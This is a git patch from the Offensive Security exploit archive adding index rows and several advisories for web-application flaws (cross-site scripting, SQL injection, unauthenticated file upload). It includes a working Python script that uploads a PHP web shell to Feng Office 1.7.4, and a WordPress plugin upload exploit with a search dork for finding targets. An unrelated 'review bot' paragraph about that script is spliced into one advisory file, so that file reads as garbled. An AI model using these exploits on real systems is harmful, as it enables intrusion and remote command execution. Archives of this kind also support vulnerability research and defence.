From 2dfafcbe5d108fcb4754bc8e310c15e782ee9f3e Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 25 Oct 2014 04:45:12 +0000
Subject: [PATCH] Updated 10_25_2014

---
 files.csv | 8 ++++++
 platforms/asp/webapps/35045.txt | 9 +++++++
 platforms/asp/webapps/35048.txt | 9 +++++++
 platforms/asp/webapps/35049.txt | 9 +++++++
 platforms/php/webapps/34922.txt | 37 ++++++++++++++++++++++++++++
 platforms/php/webapps/35041.py | 43 +++++++++++++++++++++++++++++++++
 platforms/php/webapps/35042.txt | 10 ++++++++
 platforms/php/webapps/35043.txt | 18 ++++++++++++++
 platforms/php/webapps/35044.txt | 11 +++++++++
 9 files changed, 154 insertions(+)
 create mode 100755 platforms/asp/webapps/35045.txt
 create mode 100755 platforms/asp/webapps/35048.txt
 create mode 100755 platforms/asp/webapps/35049.txt
 create mode 100755 platforms/php/webapps/34922.txt
 create mode 100755 platforms/php/webapps/35041.py
 create mode 100755 platforms/php/webapps/35042.txt
 create mode 100755 platforms/php/webapps/35043.txt
 create mode 100755 platforms/php/webapps/35044.txt

diff --git a/files.csv b/files.csv
index d16d5bb9b..e14d3a03a 100755
--- a/files.csv
+++ b/files.csv
@@ -31447,6 +31447,7 @@ id,file,description,date,author,platform,type,port
 34918,platforms/cgi/webapps/34918.txt,"Ultra Electronics 7.2.0.19 and 7.4.0.7 - Multiple Vulnerabilities",2014-10-06,"OSI Security",cgi,webapps,443
 34919,platforms/php/webapps/34919.txt,"SkyBlueCanvas 1.1 r237 'admin.php' Directory Traversal Vulnerability",2009-07-16,MaXe,php,webapps,0
 34921,platforms/windows/local/34921.pl,"Asx to Mp3 2.7.5 - Stack Overflow",2014-10-07,"Amir Tavakolian",windows,local,0
+34922,platforms/php/webapps/34922.txt,"Creative Contact Form - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0
 34923,platforms/linux/local/34923.c,"Linux Kernel 3.16.1 - Remount FUSE Exploit",2014-10-09,"Andy Lutomirski",linux,local,0
 34924,platforms/windows/webapps/34924.txt,"BMC Track-It! - Multiple Vulnerabilities",2014-10-09,"Pedro Ribeiro",windows,webapps,0
 34925,platforms/php/remote/34925.rb,"Wordpress InfusionSoft Plugin Upload Vulnerability",2014-10-09,metasploit,php,remote,80
@@ -31554,3 +31555,10 @@ id,file,description,date,author,platform,type,port
 35038,platforms/ios/webapps/35038.txt,"File Manager 4.2.10 iOS - Code Execution Vulnerability",2014-10-22,Vulnerability-Lab,ios,webapps,80
 35039,platforms/windows/webapps/35039.rb,"DotNetNuke DNNspot Store 3.0.0 Arbitary File Upload",2014-10-22,"Glafkos Charalambous ",windows,webapps,0
 35040,platforms/windows/local/35040.txt,"iBackup 10.0.0.32 - Local Privilege Escalation",2014-10-22,"Glafkos Charalambous ",windows,local,0
+35041,platforms/php/webapps/35041.py,"Feng Office 1.7.4 - Arbitrary File Upload",2014-10-23,"AutoSec Tools",php,webapps,0
+35042,platforms/php/webapps/35042.txt,"Feng Office 1.7.4 - Cross Site Scripting Vulnerabilities",2014-10-23,"AutoSec Tools",php,webapps,0
+35043,platforms/php/webapps/35043.txt,"Contenido CMS 4.8.12 Multiple Cross Site Scripting Vulnerabilities",2010-12-02,"High-Tech Bridge SA",php,webapps,0
+35044,platforms/php/webapps/35044.txt,"Alguest 1.1 Multiple Cookie Authentication Bypass Vulnerabilities",2010-12-03,"Aliaksandr Hartsuyeu",php,webapps,0
+35045,platforms/asp/webapps/35045.txt,"DotNetNuke 5.5.1 'InstallWizard.aspx' Cross Site Scripting Vulnerability",2010-12-03,"Richard Brain",asp,webapps,0
+35048,platforms/asp/webapps/35048.txt,"Techno Dreams Articles & Papers Package 2.0 'ArticlesTablelist.asp' SQL Injection Vulnerability",2010-12-04,R4dc0re,asp,webapps,0
+35049,platforms/asp/webapps/35049.txt,"Techno Dreams FAQ Manager Package 1.0 'faqlist.asp' SQL Injection Vulnerability",2010-12-04,R4dc0re,asp,webapps,0
diff --git a/platforms/asp/webapps/35045.txt b/platforms/asp/webapps/35045.txt
new file mode 100755
index 000000000..fe9e3d0a5
--- /dev/null
+++ b/platforms/asp/webapps/35045.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45180/info
+
+DotNetNuke is prone to a cross-site-scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+DotNetNuke 5.5.1 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/Install/InstallWizard.aspx?__VIEWSTATE=
\ No newline at end of file
diff --git a/platforms/asp/webapps/35048.txt b/platforms/asp/webapps/35048.txt
new file mode 100755
index 000000000..2c34f5f20
--- /dev/null
+++ b/platforms/asp/webapps/35048.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45201/info
+
+Techno Dreams Articles & Papers Package is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Techno Dreams Articles & Papers Package 2.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/papers/ArticlesTablelist.asp?order=[Code]
\ No newline at end of file
diff --git a/platforms/asp/webapps/35049.txt b/platforms/asp/webapps/35049.txt
new file mode 100755
index 000000000..ed1919653
--- /dev/null
+++ b/platforms/asp/webapps/35049.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45202/info
+
+Techno Dreams FAQ Manager Package is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Techno Dreams FAQ Manager Package 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/FAQ/faqlist.asp?order=[Code]
\ No newline at end of file
diff --git a/platforms/php/webapps/34922.txt b/platforms/php/webapps/34922.txt
new file mode 100755
index 000000000..b56bed379
--- /dev/null
+++ b/platforms/php/webapps/34922.txt
@@ -0,0 +1,37 @@
+==========================================================
+"Creative Contact Form - The Best WordPress Contact Form Builder" -
+Arbitrary File Upload
+
+# Author: Gianni Angelozzi
+# Date: 08/10/2014
+# Remote: Yes
+# Vendor Homepage: https://profiles.wordpress.org/creative-solutions-1/
+# Software Link: https://wordpress.org/plugins/sexy-contact-form/
+# CVE: CVE-2014-7969
+# Version: all including latest 0.9.7
+# Google Dork: inurl:"wp-content/plugins/sexy-contact-form"
+
+This plugin includes a PHP script to accept file uploads that doesn't
+perform any security check, thus allowing unauthenticated remote file
+upload, leading to remote code execution. All versions are affected.
+Uploaded files are stored with their original file name.
+==========================================================
+PoC
+==========================================================
+Trigger a file upload
+
+
+
+
+Then the file is accessible under
+
+http://TARGET/wp-content/plugins/sexy-contact-form/includes/fileupload/files/FILENAME
+==========================================================
+EOF
+
+
+Thanks,
+
+Gianni Angelozzi
diff --git a/platforms/php/webapps/35041.py b/platforms/php/webapps/35041.py
new file mode 100755
index 000000000..0bff531e0
--- /dev/null
+++ b/platforms/php/webapps/35041.py
@@ -0,0 +1,43 @@
+import socket
+
+host = 'localhost'
+path = '/feng_community'
+shell_path = '/tmp'
+port = 80
+
+def upload_shell():
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.connect((host, port))
+ s.settimeout(8)
+
+ s.send('POST ' + path + '/public/assets/javascript/ckeditor/ck_upload_handler.php HTTP/1.1\r\n'
+ 'Host: localhost\r\n'
+ 'Proxy-Connection: keep-alive\r\n'
+ 'User-Agent: x\r\n'
+ 'Content-Length: 195\r\n'
+ 'Cache-Control: max-age=0\r\n'
+ 'Origin: null\r\n'
+ 'Content-Type: multipart/form-data; boundary=----x\r\n'
+ 'Accept: text/html\r\n'
+ 'Accept-Encoding: gzip,deflate,sdch\r\n'
+ 'Accept-Language: en-US,en;q=0.8\r\n'
+ 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
+ '\r\n'
+ '------x\r\n'
+ 'Content-Disposition: form-data; name="shell_file"; filename="shell.php"\r\n'
+ 'Content-Type: application/octet-stream\r\n'
+ '\r\n'
+ '\' + system($_GET[\'CMD\']) + \'\'; ?>\r\n'
+ '------x--\r\n'
+ '\r\n')
+
+ resp = s.recv(8192)
+
+ http_ok = 'HTTP/1.1 200 OK'
+
+ if http_ok not in resp[:len(http_ok)]:
+ print 'error uploading shell'
+ return
+ else: print 'shell uploaded to http://' + host + path + shell_path
+
+upload_shell()
\ No newline at end of file
diff --git a/platforms/php/webapps/35042.txt b/platforms/php/webapps/35042.txt
new file mode 100755
index 000000000..2c0e495c7
--- /dev/null
+++ b/platforms/php/webapps/35042.txt
@@ -0,0 +1,10 @@
+Source: http://www.securityfocus.com/bid/47049/info
+
+
+
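Review bot: The new 35041.py has no header comment or docstring; the only statement of what it is for lives in the files.csv row `35041,platforms/php/webapps/35041.py,"Feng Office 1.7.4 - Arbitrary File Upload",...`, so a reader of the file alone cannot tell the product, the version, or the interpreter it assumes. A module docstring such as `"""Feng Office 1.7.4 - arbitrary file upload PoC (files.csv id 35041). Python 2 only: uses the print statement and compares the raw recv() buffer as a str."""` at the top, above `import socket`, would make the file self-describing. From a detection standpoint the request assembled in `s.send` is highly fingerprintable — the fixed `User-Agent: x`, `Origin: null`, multipart boundary `----x`, and a part named `shell_file` with `filename="shell.php"` posted to `.../ckeditor/ck_upload_handler.php` — and noting those literals in the same header would tell a defender which strings a web-server log search or an upload-filter rule for this PoC should key on.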
+" />
+
+
+
+
\ No newline at end of file
diff --git a/platforms/php/webapps/35043.txt b/platforms/php/webapps/35043.txt
new file mode 100755
index 000000000..3ddaad862
--- /dev/null
+++ b/platforms/php/webapps/35043.txt
@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/45160/info
+
+Contenido CMS is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Contenido CMS 4.8.12 is vulnerable; other versions may also be affected.
+
+
+'>
+
+